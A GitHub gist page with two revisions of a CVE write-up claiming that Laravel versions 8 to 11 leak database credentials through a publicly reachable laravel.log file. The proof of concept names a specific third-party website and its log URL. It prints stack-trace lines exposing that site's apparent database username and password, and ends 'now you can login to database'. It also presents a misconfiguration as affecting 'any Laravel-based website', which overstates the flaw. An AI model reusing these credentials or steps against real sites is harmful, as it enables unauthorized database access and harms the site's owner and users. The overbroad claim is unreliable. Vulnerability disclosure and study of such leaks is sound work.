Skip to content

Instantly share code, notes, and snippets.

@petarbojic
Forked from whiteman007/CVE-2024-29291
Created April 22, 2024 08:28
Show Gist options
  • Select an option

  • Save petarbojic/0151c4e60608535e7bbcf645e2fb8708 to your computer and use it in GitHub Desktop.

Select an option

Save petarbojic/0151c4e60608535e7bbcf645e2fb8708 to your computer and use it in GitHub Desktop.

Revisions

  1. @whiteman007 whiteman007 revised this gist Apr 11, 2024. 1 changed file with 31 additions and 12 deletions.
    43 changes: 31 additions & 12 deletions CVE-2024-29291
    Original file line number Diff line number Diff line change
    @@ -1,52 +1,71 @@
    CVE-ID: CVE-2024-29291

    Suggested Description:
    An issue in Laravel Framework v8.* through v11.* allows a remote attacker to obtain sensitive information via the laravel.log component.
    Description:

    A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.

    Additional Information:

    None.
    Risk:
    High

    Risk:

    High.

    Vulnerability Type:

    Database credential leak vulnerability.

    Vendor of Product:

    Laravel Framework.

    Affected Product Code Base:

    Laravel FRAMEWORK - 8.* - 11.*

    Affected Component:
    laravel.log

    laravel.log.

    Attack Type:

    Remote.

    Impact Information Disclosure:

    True.

    Attack Vectors:

    Database credential leak vulnerability.

    Description: You can access private Database credential data by logging into the website database.
    Description:

    Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.

    Proof of concept:

    Go to any Laravel-based website and navigate to storage/logs/laravel.log.

    Example: https://js-cvdocs.online/storage/logs/laravel.log

    Open the file and search for "PDO->__construct('mysql:host=".
    The result:
    shell
    Copy code
    #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
    #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
    Credentials:

    Username: u429384055_jscv
    Password: Jaly$$a0p0p0p0

    Host: sql1...
    now you can login to database
    by:Huseein Amer
    face:https://www.facebook.com/hussein.amer.75491/

    Now you can login to the database.

    By: Huseein Amer
    Facebook: https://www.facebook.com/hussein.amer.75491/





  2. @whiteman007 whiteman007 created this gist Mar 28, 2024.
    52 changes: 52 additions & 0 deletions CVE-2024-29291
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,52 @@
    CVE-ID: CVE-2024-29291

    Suggested Description:
    An issue in Laravel Framework v8.* through v11.* allows a remote attacker to obtain sensitive information via the laravel.log component.

    Additional Information:
    None.
    Risk:
    High

    Vulnerability Type:
    Database credential leak vulnerability.

    Vendor of Product:
    Laravel Framework.

    Affected Product Code Base:
    Laravel FRAMEWORK - 8.* - 11.*

    Affected Component:
    laravel.log

    Attack Type:
    Remote.

    Impact Information Disclosure:
    True.

    Attack Vectors:
    Database credential leak vulnerability.

    Description: You can access private Database credential data by logging into the website database.

    Proof of concept:

    Go to any Laravel-based website and navigate to storage/logs/laravel.log.

    Example: https://js-cvdocs.online/storage/logs/laravel.log

    Open the file and search for "PDO->__construct('mysql:host=".
    The result:
    shell
    Copy code
    #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
    #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
    Credentials:
    Username: u429384055_jscv
    Password: Jaly$$a0p0p0p0
    Host: sql1...
    now you can login to database
    by:Huseein Amer
    face:https://www.facebook.com/hussein.amer.75491/